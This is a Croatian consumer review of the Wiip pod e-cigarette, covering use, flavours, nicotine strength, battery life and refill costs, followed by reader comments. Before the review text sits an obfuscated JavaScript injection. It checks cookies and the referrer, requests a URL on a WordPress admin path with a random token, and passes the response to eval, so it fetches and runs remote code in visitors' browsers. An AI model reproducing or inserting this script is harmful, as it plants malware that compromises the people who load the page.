;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
wiip

wiip recenzija nakon par dana korištenja

Kasnimo s ovom wiip recenzijom. Umjesto 24 sata – koristili smo ga nekoliko dana!

Iako smo se dosta toga dotakli u prvoj Wiip recenziji, dojmovi “slegli”. Bio bi red da napišemo i nešto konkretnije.

Kao i za Veev, recenzija će se odnositi više na korisnički dojam a manje na nekakve tehničke specifikacije. To ćemo ostaviti kolegi Viktoru.

No za početak da ponovimo…

Što je wiip

Ukratko, Wiip je elektronska e cigareta, POD uređaj hrvatskog proizvođača Vape Technology. Zajednička karakteristika svih POD uređaja je da nemaju standardnu formu e cigarete. Nemaju “atomizer” i “MOD” u onom smislu kako smo navikli vidjeti. POD se sastoji od kućišta s baterijom i “patronom” (POD atomizerom, wiipodom) koji sadrži tekućinu. Također su značajno manjih dimenzija od standardne e cigarete.

Što je Wiip
Što je Wiip

Kako se koristi wiip

Korištenje uređaja je krajnje jednostavno. Wiipod (službeni naziv za patronu koja sadrži e tekućinu) umetnete u POD uređaj i to je to. Ne morate paziti kako ćete okrenuti wiipod jer za razliku od Veeva, može se umetnuti bez obzira na orijentaciju. Naravno sve dok je usnik prema gore.

Wiip recenzija
Wiip POD uređaj

I to je to. Povučete paru, kada se baterija potroši stavite ga na punjenje. Samo punjenje uređaja traje oko 40 – 60 minuta. Samo vrijeme korištenja je od prilike 3 do 4 sata.

Vrijeme korištenja je naravno individualno jer ovisi koliko ćete sam uređaj baš koristiti. Ako ga koristite češće – posežete za wiip uređajem češće – tada će se naravno baterija brže isprazniti.

SLIMS banner

Prednost wiipa

Za razliku od prethodno testiranog Veev-a Philip Morrisa Wiip uređaj radi fantastično. Doslovce se može mjeriti rame uz rame s nekim puno skupljim POD uređajima koji su trenutno dostupni na tržištu.

Generacija pare je po našem mišljenju odlična. Para je gusta i topla, te ima tu očekivanu težinu.

Okusi ko okusi – o okusima se ne raspravlja. Nekome će se svidjeti nekome ne, no moramo priznati da su neki okusi izuzetno dobri.

Ono što smo testirali su Wiipod okusi jagode, duhana i naknadno smo kupili mango na preporuku jedne članice zajednice.

wiipod
wiipod

Jagoda podsjeća na recimo Kiki bombon od jagode s dodatkom hladila. Osjeti se lagana slatkoća, lagano kremasti bombonasti okus jagode. Osjeti se i hladilo, najviše na usnama. To će se nekima svidjeti, nekima ne. To hladilo je zamjetno, no realno ne smeta previše. Eventualno na momente kao da se osjeti kemijski aftertaste – no to može biti stvar osobnog doživljaja. Sve u svemu za ovu vrstu uređaja bi dao 5/5.

Mango je također izvrstan. Izuzetno čista aroma manga te ponovo lagani dodatak hladila kao bonus. Ocjena 5/5.

Duhan je odličan, no bojimo se da je previše sladunjav. S obzirom da je e tekućina nic salt (a ne freebase nikotin) za očekivati je da će duhanska aroma neće steepati, odnosno izgubiti slatkoću s vremenom. Tako da sam duhan ima više okus na kakao nego nekakav duhan. Daleko od toga da je okus loš – nije. No poznavajući kupce – neće biti zadovoljni s tako sladunjavim i blagim okusom duhana. Ocjena 3/5.

Nedostaci wiipa

Testirane tekućine su bile 10mg, no nismo osjetili nikakav throat hit, što niti ne čudi s obzirom da se radi o nic saltima.
No to je onaj dio koji bi mogao nedostajati zagriženim pušaćima koji tek prelaze sa cigarete na e cigaretu.

Također moramo naglasiti da ta količina nikotina nije zadovoljila našu potrebu, pa smo morali ili češće koristiti Wiip, ili u međuvremenu posegnuti za standardnim uređajem.

Problem koji smo uočili je također činjenica da je jako teško vidjeti kada je Wiipod prazan. Možete to naslutiti ako imate istančane okusne pupoljke pa ćete osjetiti da je vata već suha. No, neiskusni korisnici bi mogli uploviti u dry hit ili pariti tako polu suhu vatu tko zna koliko dugo. Prilikom takvog načina parenja dolazi do većeg ispuštanja kancerogenog formaldehida iz vate i coila, što nije baš dobro.

Cijena wiipa

Eh da. Sad moramo biti realni. Ovo je također skup sport.

Moram priznati da je sve bilo OK do momenta kada nismo kupili taj dodatni Wiipod od manga za 25 kn i u kutijici našli jednu patronu. To je bio šok.

Ako usporedimo cijene:
Veev od Philip Morrisa košta 200 kn + 30kn za 2 patrone.
Wiip košta 230 kn i dobijete u njemu 2 patrone.
Dakle isto.

Razlika je u tome što kod Veev-a možete birati koji okus želite u startu dok kod Wiipa što dobijete – dobijete.

Patrone, punjenje za Veev košta 30 kn 2 komada, za Wiip 25 kn jedan komad. I to je šokantna razlika.

Ako smo za Veev rekli da je skup sport, ovo je katastrofalno skup sport.

S obzirom na našu dinamiku korištenja potrošili bi dva Wiipoda dnevno. Da se to i razvuče na jedan dnevno (a realno nismo sigurni da bi to ikoga zadovoljilo) mjesečni trošak je ravno 750 kn. To je duplo više nego za Veev patrone i šest puta više nego kod standardne e cigarete.

Strahovito skup sport.

Zaključak

Ovaj uređaj nas je iznenadio. Ne možemo reči da smo oduševljeni, voljeli bi da su neke stvari bolje riješene, no definitivno je odličan iskorak spram prethodno testiranih uređaja.

Stvar je vrlo jednostavna i ne treba je komplicirati – niti ekipa iz Vape Technology-a komplicira. To je što je, kao takvo radi izuzetno dobro, daleko bolje od očekivanog. No, mogu oni to i bolje.

Prednosti:
– dobra kvaliteta izrade, metalno kućište, lagano, kompaktno
– male dimenzije
– odlični okusi e tekućina
– odlična generacija pare, težina pare
– izuzetno jednostavno za korištene
– ima silikonski “čep” za usnik – korisno

Nedostaci:
– nic salti očito nas ne zadovoljavaju, nema throat hita
– dry hit waiting to happen – problem sa činjenicom da se teško vidi kada je patrona prazna ili pri kraju
– cijena, cijena, cijena

I to je to za sada. Vidimo se u Live Streamu petkom na YouTube kanalu za vapere.

Choose your Reaction!
 • Slazem se sa svim napisanim, ali imam jedan problem za wip uređajem koji nije naveden. Kupio sam 2 wiipoda probao sam obadva i stavio okus koji mi se vise svidio te sam stavio drugi wiipod u njegovu originalnu kutiju. Nakon sto sam potrosio prvi wiipod uzeo sam drugi i bio je na pola prazan.🥲

 • Već sam pisao o svojem iskustvu sa Wiip-om, no sad bih dodao još da je kćer bila kupila sebi uređaj,
  onako za gušt i potrošila je ravno 2 patrone bez nikotina, jer je i inače nepušač.

  Onda ga je proslijedila baki, ova je potrošila valjda jednu patronu i na kraju je Wiip završio kod moje drage.
  E, ova navalila k’o blesava na to, a usput još i cigarete kupuje.
  Pa smo se onda malo “dogovarali” da ili nek roka samo cigarete ili nek koristi Wiip, kad joj već Caliburn G nije po volji (ne pitajte me ništa, žensko je to :P ).
  Uglavnom, na kraju je i ona uspjela zaključiti da je baš neisplativo uz trošak za cigarete i sad ipak koristi Caliburn G kao backup kad ostane bez cigareta.

  Jbt, s čime se ja sve moram boriti…

  Koliko sam vidio, to je neka nova verzija uređaja a i patrone su drugačije nego prošle godine kad sam ja koristio Wiip.
  Čini mi se da su malo duže, bilo bi logično da imaju i mrvicu više kapaciteta tekućine?

 • I još jedan razlog za kupovinu je bio što sam došla u Hg spot i imali su sve okuse za isprobat s jednokratnim silikonskim nastavcima za usnik…. Sve sam isprobala i odmah sam znala kije okuse ću kupovati. 😊

 • Ja sam nekih mjesec-mjesec i po koristila Izy vape (slično Wiip-u i ista cijena) i na Izy mi je odličan okus bio Ice grape i lagani duhan,
  i to sa 12 i 18 mg nikotina, probala sam i sa 0 mg nikotina i onda je okus loš, nekako “prazan” kao da uvlačiš samo zrak sa malo mirisa.
  Inače, čitala sam na face grupama recenzije za Wiip i svi su pričali da im nakon mjesec-dva počne curiti,
  pa tako osim skupih patrona ispada da bi svako malo morali kupovati i novi uređaj, definitivno neisplativo.

 • Ja sam na Wiipu bio skoro pa puna 2 mjeseca. Igrom slučaja došao do uređaja. I kako sam u to vrijeme bio ograničen financijama, onda sam razvlačio te Wiipodove na po dan i pol, nekad i na po 2. A, onda kad uhvati kriza, ne bi mi izdržao niti 1 cijeli dan. Isprobao sam sve, no na kraju su bili Virginia i USA Mix i to od 18mg. Uređaj je žešća banana, krepao je jako brzo, kapacitet baterije nije dovoljan za neko ozbiljnije parenje. Ovo ne bih preporučio ni nekome koga mrzim. Mojih 2c.

 • Wiip je generalno super, ali je preskupo, da…

  Koristio sam ga skoro 3 mjeseca i slažem se sa svim prednostima i nedostacima koje si naveo.
  18mg mi je bilo previše, 0mg mi nije ništa, a 10mg mi je bilo tek toliko da odgodim zapaliti na neko vrijeme. Stvarno nema TH i imam osjećaj da sam bacao novce u vjetar, iako sam i sam povremeno nadopounjavao patrone. 🤣

  Što se aroma tiče… Mango i tropsko voće su odlične, jagoda i grožđe vrlo dobre, virginia i mint mogu proći, a usa miks je banana.

  • Moje mišljenje…. Izgled… Jednostavan i elegantan, pisala sam im da je moja zamjerka što nema kapicu za pod. Kad se nosi u torbi nije higijenski, a mislim da ja dizajniran da bi lagano mogla biti. Napisali su da to nemaju u planu i da mogu koristiti one silikonske gumice koje štite kontakte… Neću se hvaliti, al sam to tako i stavljala i našla sam tvrdu kutiju za tehničku koja mi je služila kao etui.
   Okusi: mango savršen, jagoda, tropik i mentol jako ukusni. Onu duhansku patronu koja dođe u kutiji nisam uspjela popariti. Bila mi je grozna… Ni sada ne parim duhanske. Zviz je vrh što se duhana tiče. Baterija mi je trajala kratko. Par sati. Moram priznat i razlog zašto sam ga kupila…. Da mogu uvući malo nikotina na mjestima gdje je zabranjeno pušenje 😂. Meni osobno okusom fino, al kupovina podova cjenovno, mislim da bi trošila 2 do 3 dnevno, iznad financijske mogućnosti i vjerojatno bi kupila 3 i externu bateriju. Odlična stvar je što ima i doživotni garanciju. Meni je jedan krepao, mislim da je malo plivao s kavom. Došla sam u hg i dobila drugi… Nisu tražili ni račun. Za ponijeti ga na neku večeru, savršen. Stane i u najmanju torbu.

   • Pa manje-više se slažem sa svime što si napisala, jedino se s ovime vezano uz bateriju ne mogu složiti zato što imam drukčije iskustvo. Vidim i da su drugi imali problema s trajanjem pa će biti da sam ja iznimka… Meni je trajala po 7-8 sati, punio sam ga samo jednom do dva puta dnevno.
    Ovo za doživotnu garanciju nisam znao :O

Leave a Comment